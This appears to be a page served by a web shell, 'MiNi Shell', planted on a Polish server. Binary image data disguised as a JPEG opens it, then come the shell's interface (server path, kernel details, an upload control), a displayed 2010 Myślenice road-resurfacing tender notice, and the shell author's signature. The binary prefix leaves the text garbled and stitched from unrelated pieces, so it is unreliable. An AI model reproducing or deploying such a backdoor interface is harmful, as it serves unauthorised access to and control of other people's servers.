JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100401/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100401/74291-N-2010.html

<p class="kh_header"><b>Myślenice: Remonty nawierzchni bitumicznych dróg powiatowych - ZP-6/2010:
- nr K1923 w miejscowości Pcim (1000 mb) i Trzemeśnia (550 mb);
- nr K1955 (700 mb);
- nr K1931 (500 mb);
- nr K1942 (740 mb);
- nr K1961 (1300 mb);
- nr K1952 (600 mb);
- nr K1950 (360 mb);
- nr K1990 (700 mb);
- nr K1925 (1200 mb);
- nr K1625 (odc. I - 550 mb, odc. II - 105 mb);
- nr K1938 (700 mb).</b><br>
<b>Numer ogłoszenia: 74291 - 2010; data zamieszczenia: 01.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych , ul. Słowackiego 82, 32-400 Myślenice, woj. małopolskie, tel. 012 2721733, faks 012 2721733.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdp-myslenice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna powiatu.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remonty nawierzchni bitumicznych dróg powiatowych - ZP-6/2010:
- nr K1923 w miejscowości Pcim (1000 mb) i Trzemeśnia (550 mb);
- nr K1955 (700 mb);
- nr K1931 (500 mb);
- nr K1942 (740 mb);
- nr K1961 (1300 mb);
- nr K1952 (600 mb);
- nr K1950 (360 mb);
- nr K1990 (700 mb);
- nr K1925 (1200 mb);
- nr K1625 (odc. I - 550 mb, odc. II - 105 mb);
- nr K1938 (700 mb)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie remontów nawierzchni bitumicznych dróg powiatowych, polegających na:
Droga nr K1923 Myślenice - Stróża - Zarabie - Pcim - Poręba - Trzemeśnia w miejscowości Pcim (1000 mb):
- wyrównanie istniejącej podbudowy tłuczniem sortowanym - 60 m3;
- ścinanie poboczy - 750 m2;
- mechaniczne wyrównanie istniejącej podbudowy mieszanką min.-bit. - 270 t;
- wykonanie nawierzchni z mieszanek min.-bit., w-wa ścieralna gr. 5 cm - 5400 m2;
- uzupełnienie poboczy tłuczniem kamiennym - 500 m2.
Trzemeśnia (550 mb):
- ścinanie poboczy - 1100 m2;
- mechaniczne wyrównanie istniejącej podbudowy mieszanką min.-bit. - 151,25 t;
- wykonanie nawierzchni z mieszanek min.-bit., w-wa ścieralna gr. 5 cm - 3025 m2;
- uzupełnienie poboczy tłuczniem kamiennym - 550 m2.
Droga nr K1955 Dobczyce - Skrzynka - Stadniki (700 mb):
- ścinanie poboczy - 1400 m2;
- mechaniczne wyrównanie istniejącej podbudowy mieszanką min.-bit. - 192,5 t;
- wykonanie nawierzchni z mieszanek min.-bit., w-wa ścieralna gr. 5 cm - 3850 m2;
- uzupełnienie poboczy tłuczniem kamiennym - 700 m2.
Droga nr K1931 Dobczyce - Kornatka - Zasań (500 mb):
- ścinanie poboczy - 1000 m2;
- mechaniczne wyrównanie istniejącej podbudowy mieszanką min.-bit. - 137,5 t;
- wykonanie nawierzchni z mieszanek min.-bit., w-wa ścieralna gr. 5 cm - 2750 m2;
- uzupełnienie poboczy tłuczniem kamiennym - 500 m2.
Droga nr K1942 Krzyszkowice p.wieś (740 mb):
- mechaniczne frezowanie nawierzchni - 200 m2;
- ścinanie poboczy - 1480 m2;
- mechaniczne wyrównanie istniejącej podbudowy mieszanką min.-bit. - 203,5 t;
- wykonanie nawierzchni z mieszanek min.-bit., w-wa ścieralna gr. 5 cm - 4070 m2;
- uzupełnienie poboczy tłuczniem kamiennym - 1110 m2.
Droga nr K1961 Łapanów - Kępanów - Komorniki (1300 mb):
- ścinanie poboczy - 2600 m2;
- mechaniczne wyrównanie istniejącej podbudowy mieszanką min.-bit. - 357,5 t;
- wykonanie nawierzchni z mieszanek min.-bit., w-wa ścieralna gr. 5 cm - 7150 m2;
- uzupełnienie poboczy tłuczniem kamiennym - 1300 m2.
Droga nr K1952 Czechówka - Byszyce (600 mb):
- ścinanie poboczy - 1200 m2;
- mechaniczne wyrównanie istniejącej podbudowy mieszanką min.-bit. - 165 t;
- wykonanie nawierzchni z mieszanek min.-bit., w-wa ścieralna gr. 5 cm - 3300 m2;
- uzupełnienie poboczy tłuczniem kamiennym - 600 m2.
Droga nr K1950 Siepraw - Grabie (360 mb):
- ścinanie poboczy - 720 m2;
- mechaniczne wyrównanie istniejącej podbudowy mieszanką min.-bit. - 97,2 t;
- wykonanie nawierzchni z mieszanek min.-bit., w-wa ścieralna gr. 5 cm - 1944 m2;
- uzupełnienie poboczy tłuczniem kamiennym - 360 m2.
Droga nr K1990 ul. Tysiąclecia w Sułkowicach (700 mb):
- ścinanie poboczy - 1400 m2;
- mechaniczne wyrównanie istniejącej podbudowy mieszanką min.-bit. - 192,5 t;
- wykonanie nawierzchni z mieszanek min.-bit., w-wa ścieralna gr. 4 cm - 3850 m2;
- uzupełnienie poboczy tłuczniem kamiennym - 700 m2.
Droga nr K1925 Wiśniowa - Węglówka (1200 mb):
- mechaniczne frezowanie nawierzchni na mostach - 275 m2;
- mechaniczne oczyszczenie nawierzchni - 275 m2;
- ścinanie poboczy - 2400 m2;
- mechaniczne wyrównanie istniejącej podbudowy mieszanką min.-bit. - 330 t;
- wykonanie nawierzchni z mieszanek min.-bit., w-wa ścieralna gr. 5 cm - 6600 m2;
- uzupełnienie poboczy tłuczniem kamiennym - 1200 m2.
Droga nr K1625 Tenczyn - Glisne - Mszana Dolna (odc. I - 550 mb):
- roboty ziemne - 165 m3;
- drenaż w korpusie drogi - 9 m3;
- oczyszczanie przepustów z namułu - 40 m;
- ścinanie poboczy - 1100 m2;
- wzmocnienie podbudowy tłuczniem sortowanym - 100 m3;
- mechaniczne wyrównanie istniejącej podbudowy mieszanką min.-asf. - 151,25 t;
- wykonanie nawierzchni z mieszanek min.-bit., w-wa ścieralna gr. 5 cm - 3025 m2;
odc. II - 105 mb:
- ścinanie poboczy - 105 m2;
- frezowanie nawierzchni bitumicznych - 100 m2;
- mechaniczne wyrównanie istniejącej podbudowy mieszanką min.-bit. - 37,3 t;
- wykonanie nawierzchni z mieszanek min.-bit., w-wa ścieralna gr. 5 cm - 546 m2;
- uzupełnienie poboczy tłuczniem kamiennym - 105 m2;
- umocnienie wlotu przepustu - 5 m2.
Droga nr K1938 Głogoczów - Bęczarka - Krzywaczka (700 mb):
- ścinanie poboczy - 1400 m2;
- mechaniczne wyrównanie istniejącej podbudowy mieszanką min.-bit. - 192,5 t;
- wykonanie nawierzchni z mieszanek min.-bit., w-wa ścieralna gr. 5 cm - 3850 m2;
- uzupełnienie poboczy tłuczniem kamiennym - 700 m2..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu Wykonawcy robót budowlanych zamówień uzupełniających, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powienien posiadać aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenie do ewidencji działalności gospodarczej - wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
1) Osoby prawne: aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru potwierdzające, że w stosunku do wykonawcy nie otwarto likwidacji lub nie ogłoszono upadłości, prowadzącej do wykluczenia z postępowania o udzielenie zamówienia - wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (art. 24 ust. 1 pkt 2 Ustawy);
2) osoby fizyczne - oświadczenie, że w stosunku do wykonawcy nie otwarto likwidacji lub nie ogłoszono upadłości, prowadzącej do wykluczenia z postępowania o udzielenie zamówienia (art. 24 ust. 1 pkt 2 Ustawy).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca posiadał doświadczenie zawodowe rozumiane jako wykonanie przez niego w ciągu ostatnich 5 lat, przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania, co najmniej 2-ch zamówień, odpowiadających swoim rodzajem, zakresem robotom stanowiącym przedmiot zamówienia o wartości, co najmniej 2 000 000,00 zł brutto każde, oraz posiadał dokumenty potwierdzające, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca robót budowlanych w celu realizacji zamówienia winien dysponować własnym lub mieć dostęp do zasobów sprzętowych, w pełni sprawnych narzędzi i urządzeń technicznych wraz z informacją o podstawie dysponowania zasobami sprzętowymi:
- koparka przedsiębierna,
- samochód ciężarowy skrzyniowy,
- samochód ciężarowy samowyładowczy,
- rozkładarka mas bitumicznych,
- walec ogumiony,
- walec statyczny,
- zagęszczarka płytowa.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca dysponował osobami zdolnymi do wykonania zamówienia, tj. Kierownikiem Budowy, posiadającym uprawnienia budowlane do wykonania robót drogowych i doświadczenie w kierowaniu takimi robotami tj. uprawnienia wymagane przepisami prawa budowlanego do kierowania robotami budowlanymi oraz należącego do Izby Inżynierskiej. Wykonawca złoży oświadczenia na temat wielkości średniego rocznego zatrudnienia u Wykonawcy robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich 3 lat przed upływem terminu składania ofert, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie. Wykonawca przedłoży wykaz osbób, które będą uczestniczyć w wykonywaniu zamówienia, lub będą kierować robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informację o podstawie do dysponownia tymi osobami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca znajdował się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj. aby posiadał opłaconą polisę a w przypadku jej braku innego dokumentu potwierdzajacego, że ma ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w ramach, której wykonywał będzie zamówienie publiczne na podstawie tej Specyfikacji. W przypadku, gdy ważność ubezpieczenia uzależniona jest od zapłaty składki wraz z polisą Wykonawca zobowiązany jest przedłożyć dokument jej opłacenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdp-myslenice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Myślenicach
ul. Słowackiego 82
32-400 Myślenice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.04.2010 godzina 09:00, miejsce: Zarząd Dróg Powiatowych w Myślenicach
ul. Słowackiego 82.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com